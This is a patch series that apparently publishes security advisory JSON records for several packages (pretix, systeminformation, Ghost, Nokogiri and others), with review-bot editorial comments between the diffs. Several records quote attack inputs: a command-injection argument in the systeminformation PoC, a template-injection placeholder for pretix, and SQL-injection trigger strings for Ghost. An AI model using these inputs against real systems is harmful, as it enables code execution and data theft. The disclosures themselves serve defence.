@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjf9-j9vw-27f4", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70064" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify system data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70064" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/c6f20cd6db1fbb1f0e7e199ead66691d" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json index 092331961c32b..6de3b3a47acd8 100644 --- a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json new file mode 100644 index 0000000000000..857d992cdfa7a 
--- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-gfvf-4g86", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-1272" + ], + "details": "The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection. This vulnerability affects only Fedora Linux.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:6966" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345615" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json index c4fbde5492dcc..9a34bbdf7d186 100644 --- a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json +++ b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, 
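Review bot: `cwe_ids` is left empty in the new GHSA-xj75-gfvf-4g86 record even though `severity` is `HIGH`, so CWE-based filters and dashboards will never surface it. The details describe a protection mechanism (kernel lockdown) being disabled without warning; a class such as `CWE-693` looks like a candidate, to be confirmed against the upstream CVE entry before it is added. The details string also has a dropped word and a doubled one: I would change the two phrases to `sensitive information such as kernel memory mappings` and `execution of untrusted code, breaking any Secure Boot protection`.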
diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json index 57ba37db12fa6..44a5357ce56be 100644 --- a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xqcm-jrw9-wq72", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-14282" @@ -23,6 +23,18 @@ "type": "WEB", "url": "https://github.com/mkj/dropbear/pull/391" }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/394" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052" + }, { "type": "WEB", "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" diff --git a/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json new file mode 100644 index 0000000000000..d335397c9f0a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json 
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xrj7-v4x4-74hr",
+ "modified": "2026-02-18T21:31:23Z",
+ "published": "2026-02-18T21:31:23Z",
+ "aliases": [
+ "CVE-2025-8860"
+ ],
+ "details": "A flaw was found in QEMU in the uefi-vars virtual device. When the guest writes to register UEFI_VARS_REG_BUFFER_SIZE, the .write callback `uefi_vars_write` is invoked. The function allocates a heap buffer without zeroing the memory, leaving the buffer filled with residual data from prior allocations. When the guest later reads from register UEFI_VARS_REG_PIO_BUFFER_TRANSFER, the .read callback `uefi_vars_read` returns leftover metadata or other sensitive process memory from the previously allocated buffer, leading to an information disclosure vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8860"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2025-8860"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387588"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-212"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T21:16:22Z"
+ }
+}
\ No newline at end of file
From c7b29b3cc7a6223d57775d1b036bb3dd6adfffde Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:46:10 +0000 Subject: [PATCH 016/174] Publish Advisories GHSA-r8p8-qw9w-j9qv GHSA-w7h5-55jg-cq2f GHSA-r8p8-qw9w-j9qv --- .../GHSA-r8p8-qw9w-j9qv.json | 111 ++++++++++++++++++ .../GHSA-w7h5-55jg-cq2f.json | 61 ++++++++++ .../GHSA-r8p8-qw9w-j9qv.json | 36 ------ 3 files changed, 172 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json diff --git a/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json new file mode 100644 index 0000000000000..379031026177a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json 
@@ -0,0 +1,111 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r8p8-qw9w-j9qv",
+ "modified": "2026-02-18T21:44:45Z",
+ "published": "2026-02-16T12:30:25Z",
+ "aliases": [
+ "CVE-2026-2415"
+ ],
+ "summary": "pretix unsafely evaluates variables in emails",
+ "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when `{name}` is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs:\n\n - It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as `{event.__init__.__code__.co_filename}}`. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject.\n\n - Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is `{invoice_company}`, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. 
However, we also consider this scenario very unlikely under typical conditions.\n\nOut of caution, pretix recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "pretix"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2026.1.0"
+ },
+ {
+ "fixed": "2026.1.1"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "pretix"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2025.10.0"
+ },
+ {
+ "fixed": "2025.10.2"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "pretix"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2025.9.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pretix/pretix/commit/ba11d24f8dfa4e9d8f03493e56fd8b43983fe297"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pretix/pretix/commit/c85afbc621b5f0b1afa618627c45f89323eb0154"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pretix/pretix/commit/edac35ed4c5466eb63a202575c337d117ddf1c8e"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/pretix/pretix"
+ },
+ {
+ "type": "WEB",
+ "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-627"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T21:44:45Z",
+ "nvd_published_at": "2026-02-16T11:15:56Z"
+ }
+}
\ No newline at end of file
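Review bot: The closing sentence of `details` carries the one action operators must take beyond upgrading, rotating the secrets held in the config file, and it is the most damaged part of the text: the link markup was lost, leaving `pretix.cfg https://docs.pretix.eu/self-hosting/config/  file`, and the verb does not agree. I would write `pretix recommends that you rotate all passwords and API keys contained in your [pretix.cfg](https://docs.pretix.eu/self-hosting/config/) file`, matching the markdown link style the database uses in reviewed advisories. The example placeholder in the first bullet also appears malformed, with one opening and two closing braces; dropping the extra `}` keeps the syntax unambiguous for readers auditing their own email templates.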
diff --git a/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json
new file mode 100644
index 0000000000000..6d14735313222
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7h5-55jg-cq2f", + "modified": "2026-02-18T21:45:06Z", + "published": "2026-02-18T21:45:06Z", + "aliases": [ + "CVE-2026-26974" + ], + "summary": "Improper Control of Generation of Code ('Code Injection') in @tygo-van-den-hurk/slyde", + "details": "### Impact\nThis is a **remote code execution (RCE) vulnerability**. Node.js automatically imports `**/*.plugin.{js,mjs}` files including those from `node_modules`, so any malicious package with a `.plugin.js` file could execute arbitrary code when installed or required. **All projects using this loading behavior are affected**, especially those installing untrusted packages.\n\n### Patches\nThe issue has been **patched in v0.0.5**. Users should upgrade to **v0.0.5 or later** to mitigate the vulnerability.\n\n### Workarounds\n- Audit and restrict which packages are installed in `node_modules`.\n\n### References\n- [CWE-94: Improper Control of Generation of Code](https://cwe.mitre.org/data/definitions/94.html) \n- GitHub Security Advisories documentation: [https://docs.github.com/en/code-security/security-advisories](https://docs.github.com/en/code-security/security-advisories)", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@tygo-van-den-hurk/slyde" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/security/advisories/GHSA-w7h5-55jg-cq2f" + }, + { + "type": "WEB", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde/commit/e4c215b061e44fd2ead805de34d72642a710af60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Tygo-van-den-Hurk/Slyde" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829" + ], + "severity": "HIGH", + 
"github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:45:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json deleted file mode 100644 index dafc5f9866b7e..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json +++ /dev/null 
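Review bot: The `cwe_ids` entry in `database_specific` lists `CWE-829`, while the `summary` and the References part of `details` both name CWE-94, so tooling that filters on the structured field and a reader of the text see different weakness classes. The behaviour described in `details`, files matching `**/*.plugin.{js,mjs}` being imported from `node_modules`, reads more like inclusion of untrusted functionality, so either list both (`"cwe_ids": ["CWE-94", "CWE-829"]`) or bring the summary in line with the structured value. The single workaround would also benefit from a caveat that auditing `node_modules` is a stopgap, not a substitute for upgrading to the v0.0.5 release named under Patches.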
@@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r8p8-qw9w-j9qv", - "modified": "2026-02-16T12:30:25Z", - "published": "2026-02-16T12:30:25Z", - "aliases": [ - "CVE-2026-2415" - ], - "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when {name}\n is used in an email template, it will be replaced with the buyer's \nname for the final email. This mechanism contained two security-relevant\n bugs:\n\n\n\n * \nIt was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as {{event.__init__.__code__.co_filename}}.\n This way, an attacker with the ability to control email templates \n(usually every user of the pretix backend) could retrieve sensitive \ninformation from the system configuration, including even database \npasswords or API keys. pretix does include mechanisms to prevent the usage of such \nmalicious placeholders, however due to a mistake in the code, they were \nnot fully effective for the email subject.\n\n\n\n\n * \nPlaceholders in subjects and plain text bodies of emails were \nwrongfully evaluated twice. Therefore, if the first evaluation of a \nplaceholder again contains a placeholder, this second placeholder was \nrendered. This allows the rendering of placeholders controlled by the \nticket buyer, and therefore the exploitation of the first issue as a \nticket buyer. Luckily, the only buyer-controlled placeholder available \nin pretix by default (that is not validated in a way that prevents the \nissue) is {invoice_company}, which is very unusual (but not\n impossible) to be contained in an email subject template. In addition \nto broadening the attack surface of the first issue, this could \ntheoretically also leak information about an order to one of the \nattendees within that order. 
However, we also consider this scenario \nvery unlikely under typical conditions.\n\n\nOut of caution, we recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", - "severity": [ - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:L/U:Red" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" - }, - { - "type": "WEB", - "url": "https://pretix.eu/about/en/blog/20260216-release-2026-1-1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-627" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-16T11:15:56Z" - } -} \ No newline at end of file From c14bf0f3db0a55cc372a2339268f4817b619f4b2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:51:51 +0000 Subject: [PATCH 017/174] Publish Advisories GHSA-9c88-49p5-5ggf GHSA-w52v-v783-gw97 --- .../GHSA-9c88-49p5-5ggf.json | 61 +++++++++++++++++ .../GHSA-w52v-v783-gw97.json | 65 +++++++++++++++++++ 2 files changed, 126 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json diff --git a/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json new file mode 100644 index 0000000000000..530dc0bbbc633 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-9c88-49p5-5ggf/GHSA-9c88-49p5-5ggf.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c88-49p5-5ggf", + "modified": "2026-02-18T21:51:26Z", + "published": "2026-02-18T21:51:26Z", + "aliases": [ + "CVE-2026-26280" + ], + "summary": "Systeminformation has a Command Injection via unsanitized interface parameter in wifi.js retry path", + "details": "### Summary\nA command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path.\n\n### Details\nIn `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`.\n\n### PoC\n1. Install `systeminformation@5.30.7`\n2. Call `si.wifiNetworks('eth0; id')`\n3. The first call sanitizes input, but if results are empty, the retry executes: `iwlist eth0; id scan`\n\n### Impact\nRemote Code Execution (RCE). 
Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "systeminformation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.30.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-9c88-49p5-5ggf" + }, + { + "type": "WEB", + "url": "https://github.com/sebhildebrandt/systeminformation/commit/22242aa56188f2bffcbd7d265a11e1ebb808b460" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sebhildebrandt/systeminformation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:51:26Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json new file mode 100644 index 0000000000000..74a6a2ffb3f09 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w52v-v783-gw97/GHSA-w52v-v783-gw97.json 
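Review bot: The `severity` vector uses `AV:L`, but the Impact section of `details` opens with "Remote Code Execution (RCE)"; the two should agree so that consumers triaging on the CVSS vector and readers of the text reach the same conclusion. The following sentence already scopes the issue to applications that pass user-controlled input to `si.wifiNetworks()`, so the heading term could be reworded to match that scope, for example `Arbitrary command execution when the interface argument is attacker-influenced.` The record also has no mitigation text for operators who cannot move to the fixed 5.30.8 at once. A line recommending that callers check the interface name against the names returned by `os.networkInterfaces()` before calling the function would cover that.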
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w52v-v783-gw97", + "modified": "2026-02-18T21:50:23Z", + "published": "2026-02-18T21:50:23Z", + "aliases": [ + "CVE-2026-26980" + ], + "summary": "Ghost has a SQL injection in Content API", + "details": "### Impact\n\nA SQL injection vulnerability existed in Ghost's Content API that allowed unauthenticated attackers to read arbitrary data from the database. \n\n### Vulnerable Versions\n\nThis vulnerability is present in Ghost v3.24.0 to v6.19.0.\n\n### Patches\n\nv6.19.1 contains a fix for this issue.\n\n### Workarounds\n\nThere is no application-level workaround. The Content API key is public by design, so restricting key access does not mitigate this vulnerability.\n\nAs a temporary mitigation, a reverse proxy or WAF rule can be used to block Content API requests containing `slug%3A%5B` or `slug:[` in the query string filter parameter. Note that this may break legitimate slug filter functionality.\n\n### References\n\nWe thank Nicholas Carlini using Claude, Anthropic for disclosing this vulnerability responsibly. 
\n\n### For more information\nIf you have any questions or comments about this advisory, email us at [security@ghost.org](mailto:security@ghost.org).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ghost" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.24.0" + }, + { + "fixed": "6.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TryGhost/Ghost" + }, + { + "type": "WEB", + "url": "https://github.com/TryGhost/Ghost/releases/tag/v6.19.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:50:23Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2f7e08e7290bcb51e4a5c7dd1b16e03e86d8e65f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:59:30 +0000 Subject: [PATCH 018/174] Publish GHSA-wx95-c6cv-8532 --- .../GHSA-wx95-c6cv-8532.json | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json diff --git a/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json new file mode 100644 index 0000000000000..ddb15dfd85c75 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wx95-c6cv-8532/GHSA-wx95-c6cv-8532.json 
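Review bot: The temporary mitigation in the Workarounds section of `details` is expressed as two literal strings, `slug%3A%5B` and `slug:[`, without saying that the rule must be evaluated on the decoded, normalised query string; a rule written against those literals alone depends on one specific encoding of the request. I would add a sentence such as `Apply the rule to the URL-decoded filter parameter and treat it as a stopgap until v6.19.1 is deployed.` Separately, the `severity` vector carries `I:H/A:L` while the Impact section describes only reading arbitrary data from the database. If integrity or availability impact is intended, the text should state it; otherwise the vector should be revisited.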
@@ -0,0 +1,55 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx95-c6cv-8532", + "modified": "2026-02-18T21:57:38Z", + "published": "2026-02-18T21:57:38Z", + "aliases": [], + "summary": "Nokogiri does not check the return value from xmlC14NExecute", + "details": "## Summary\n\nNokogiri's CRuby extension fails to check the return value from `xmlC14NExecute` in the method `Nokogiri::XML::Document#canonicalize` and `Nokogiri::XML::Node#canonicalize`. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may allow downstream libraries to accept invalid or incomplete canonicalized XML, which has been demonstrated to enable signature validation bypass in SAML libraries.\n\nJRuby is not affected, as the Java implementation correctly raises `RuntimeError` on canonicalization failure.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.19.1`.\n\n## Severity\n\nThe maintainers have assessed this as **Medium** severity. Nokogiri itself is a parsing library without a clear security boundary related to canonicalization, so the direct impact is that a method returns incorrect data on invalid input. 
However, this behavior was exploited in practice to bypass SAML signature validation in downstream libraries (see References).\n\n## Credit\n\nThis vulnerability was responsibly reported by HackerOne researcher `d4d`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "nokogiri" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.1" + }, + { + "fixed": "1.19.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-wx95-c6cv-8532" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sparklemotion/nokogiri" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-252" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T21:57:38Z", + "nvd_published_at": null + } +} \ No newline at end of file From 41148b5be8d4f3f61e281f3c7866bdda69576f76 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 22:08:48 +0000 Subject: [PATCH 019/174] Publish Advisories GHSA-5pqf-54qp-32wx GHSA-93fx-g747-695x GHSA-fqx6-693c-f55g GHSA-gqx7-99jw-6fpr --- .../GHSA-5pqf-54qp-32wx.json | 69 ++++++++++++++++++ .../GHSA-93fx-g747-695x.json | 69 ++++++++++++++++++ .../GHSA-fqx6-693c-f55g.json | 70 +++++++++++++++++++ .../GHSA-gqx7-99jw-6fpr.json | 69 ++++++++++++++++++ 4 files changed, 277 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-5pqf-54qp-32wx/GHSA-5pqf-54qp-32wx.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-fqx6-693c-f55g/GHSA-fqx6-693c-f55g.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-gqx7-99jw-6fpr/GHSA-gqx7-99jw-6fpr.json 
